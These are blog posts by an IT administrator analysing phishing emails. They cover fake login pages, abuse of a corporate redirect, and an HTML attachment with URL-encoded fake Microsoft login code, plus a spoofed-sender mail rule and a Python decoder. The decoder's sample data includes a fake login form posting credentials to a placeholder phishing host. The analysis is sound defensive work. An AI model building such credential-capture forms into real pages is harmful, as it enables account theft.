From a local county email address, asking me to ‘please complete the required training’. Takes you to a hacked wordpress site (based on the wp-crons URL)
Gives a fairly standard fake OWA login page
Then asks for more info
Note: DD/MM/YYYY not MM/DD/YYYY oddly. Are they targeting Europe?
Then you have to ‘wait’ for security (i.e. make it look like it’s doing something)
Then you get a nice word doc. Oddly it didn’t redirect me (was that bit broken?), but commonly they will bounce you over to the real outlook site.
Throwing it at Virus Total doesn’t find anything
I used an online viewer to check the document and it really is an employee evaluation form
This is to try to make the recipient not question it, at least not until later when they try to take the completed form to HR!
Note the spaces in 365, presumably to try to avoid filters looking for ‘365’.
The link I find interesting (and annoying)
Looks like it’s going to BMW USA.com. And it really is! It uses them to redirect. Not sure how, or why that works (my guess is it’s used to redirect to your local BMW retailer or something).
Interestingly they do some form of lookup for the ID. I tried a few random ones which didn’t work. So maybe dealer ID or similar?
I’ve seen a trend of this recently, where spammers are using legitimate companies as relays, so it looks more legitimate. All the ‘usual’ checks like newly registered domains, or whether it has links online (Alexa scores or similar), will be passed by using an actual website.
I just heard back from BMW this morning that this was fixed hence the post now, nine months later about it 🙂
In short, you should have warnings on external emails. Yes in Outlook you can look at the address, but on other platforms (Apple for one) it just shows the ‘from’ name. Also if you spoof an internal email Outlook will ‘helpfully’ look up the photo of the person and add that for you making it look like the person actually sent the email!
As mentioned in the last post, I based all of this on this post on external email warnings. But I did create a second one for spoofed emails which matches:
If the message:
Sender's address domain portion belongs to any of these domains: 'company.com' or 'company.org'
and Is received from 'Outside the organization'
Take the following actions:
Prepend the message with the disclaimer 'WARNING: Please contact IT - this email appears to be a Phishing attempt'. If the disclaimer can't be applied, attach the message to a new disclaimer message.
Except if the message:
Is received from 'Partner company that sends emails as us'
Basically, flag any external email that claims to be from an internal domain. I highly recommend that you test this first, as there will be domains you will have to exclude from this, like payroll companies and similar that email as your company. But it should help with phishing emails.
Security should be like olden castles. Not just one door to get in, but moats, multiple walls, towers etc. Multiple defenses to stop the bad guys. Assume they will get in, but then they have to avoid all your traps to remain undetected. This is just one of many things you can do to protect yourself.
Another phishing email. I’ll explain the boxes at the top later – that is me, not the email. Blurred regions are email addresses.
Again, links go to some website. WordPress again. People, you need to update your WordPress! And stop using all the plugins. No, I’m not saying WordPress is terrible. I’m using it for this site. I’m saying (as with all things) you need to patch early, and patch often! Too many times people spin up a WordPress site, then basically ignore it for updates, and then it gets hacked.
The link (once I changed the email address) goes to a fake login page. Interestingly not a fake Microsoft, just a random one. It pulls the name after the @ to put it in the blurred regions. So let’s say it was ‘[email protected]’ you were using, it says ‘Whitehouse Online Webmail App’. Also, Copyright 2019?
Then the usual trick of saying your password is wrong, to make people re-enter to confirm they were entering it correctly
Then the ‘you fixed it’ message (and now copyright 2018?)
And it redirects you to the domain for your email.
Now to explain the boxes on the email. Microsoft Rules, basically. The red one triggers on any email from external, that doesn’t match our domain. Then you have to whitelist anything that legitimately spoofs your domain. The yellow one is just triggered on any external emails. Not 100% but works pretty well. I should do another post explaining it, but in short I used this and made a second one based off of that.
I’ve had several users reporting phishing emails. Let’s look at one of them.
A user received an email that just said “You’ve recieved [sic] a document on Onedrive.” It had an attached HTML document. They correctly reported it (yay!) and I looked at it. And it looks like a lazy scammer, because it should probably say “You’ve received a voicemail“. But more on that later.
First of all, I have HTML files opening by default in VSCodium (so I can’t accidentally run any of this), but if you open the file it looks… well, horrible.
And this goes on and on and on
Now, as I’m not Neo, I don’t know what that means. But the CyberChef tool from GCHQ will tell you. Just run the URL Decode function, which should be right here. Copy and paste the bits between unescape(‘THE BITS HERE’) and drop them into CyberChef to see the HTML code created.
Looks like it is making a fake Microsoft login page there. You can quickly look at the URLs it tries to load to get a quick idea of what is going on.
Nothing particularly odd here (yet). Using Bootstrap and Cloudflare, which makes sense as that would look ‘normal’ if you are checking. But that was just the first of three encoded bits. The second looks more interesting (the highlighted email address has been edited to a nonsense one).
CyberChef again to the rescue to see
And there is the fake login
Now let’s look at the third section and any http links
Well, that looks interesting. Looks like it sends the email address there (I’m sure to autopopulate it, to make it look more legitimate). There are two more links that are interesting. Let’s look at the first one.
This time it is sending the username and password to that website when you attempt to log in to ‘Microsoft’. That website doesn’t appear to be working right now. Now let’s look at the other interesting link.
This one is the most interesting, and why I think it should have said voicemail and not document. If you go there, it plays an archive.org file of a voicemail saying “Hi, please give me a call, thank you, bye“. This might actually be the cleverest bit of this, as you just think it’s a wrong number and move on. If you click something and nothing happens, you start to question it. If you click something and something opens, you don’t.
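The CyberChef steps above (pull out each unescape(‘…’) chunk, URL-decode it, then read off the URLs) can be scripted for triage. This is an added example, not code from the post: it builds a constructed three-chunk attachment with placeholder domains, decodes it, and lists every action/src/href URL, marking form actions as the place credentials would be posted.

```python
"""Triage helper for HTML phishing attachments that hide their markup in
JavaScript unescape('%3C...') calls. Added example, not from the original post."""
from __future__ import annotations
import re
from urllib.parse import unquote

# The string literal passed to unescape(...), single- or double-quoted.
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)
# Attributes that point somewhere: form actions (where input is posted),
# script/iframe/link sources, and plain links.
URL_ATTR = re.compile(r"""\b(action|src|href)\s*=\s*['"]?(https?://[^'"\s>]+)""", re.I)

def decode_unescape_chunks(html: str) -> list[str]:
    """Return the decoded HTML of every unescape('...') call, in document order."""
    return [unquote(m.group(2)) for m in UNESCAPE_CALL.finditer(html)]

def extract_urls(decoded_chunks: list[str]) -> list[tuple[str, str]]:
    """Return (attribute, url) pairs; an 'action' entry is where the form
    sends whatever the victim types."""
    found = []
    for chunk in decoded_chunks:
        for m in URL_ATTR.finditer(chunk):
            found.append((m.group(1).lower(), m.group(2)))
    return found

def _pct(s: str) -> str:
    """Percent-encode every character, as the attachment did (sample data only)."""
    return "".join(f"%{ord(c):02X}" for c in s)

# Constructed sample attachment: a page skeleton, a fake login form, and a
# follow-up link, matching the three chunks described in the post. Placeholder domains.
SAMPLE_HTML = (
    "<script>document.write(unescape('"
    + _pct('<link rel="stylesheet" href="https://cdn.example.net/bootstrap.min.css">')
    + "'));document.write(unescape(\""
    + _pct('<form method="post" action="https://phish.example.org/login.php">'
           '<input name="email" value="user@example.com"></form>')
    + "\"));document.write(unescape('"
    + _pct('<a href="https://phish.example.org/voicemail.php">Play message</a>')
    + "'));</script>"
)

if __name__ == "__main__":
    for attr, url in extract_urls(decode_unescape_chunks(SAMPLE_HTML)):
        label = "CREDENTIAL SINK" if attr == "action" else attr
        print(f"{label:16} {url}")
```

Point it at a real attachment by reading the file into a string in place of SAMPLE_HTML; nothing is fetched, so the URLs can be checked against your proxy or mail logs without touching the phishing site.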
Now this is as far as I’m taking it. The website is down, my user didn’t click the link, and the email was spoofed from the user, so there isn’t really much more I can do. If the website was up, it wouldn’t be too hard to set up a python script to make up random email addresses and passwords, but in my mind that crosses the line unless you can guarantee that only email addresses you control are used. While it’s astronomically unlikely you will get a valid username and password, you might end up locking a valid email account out.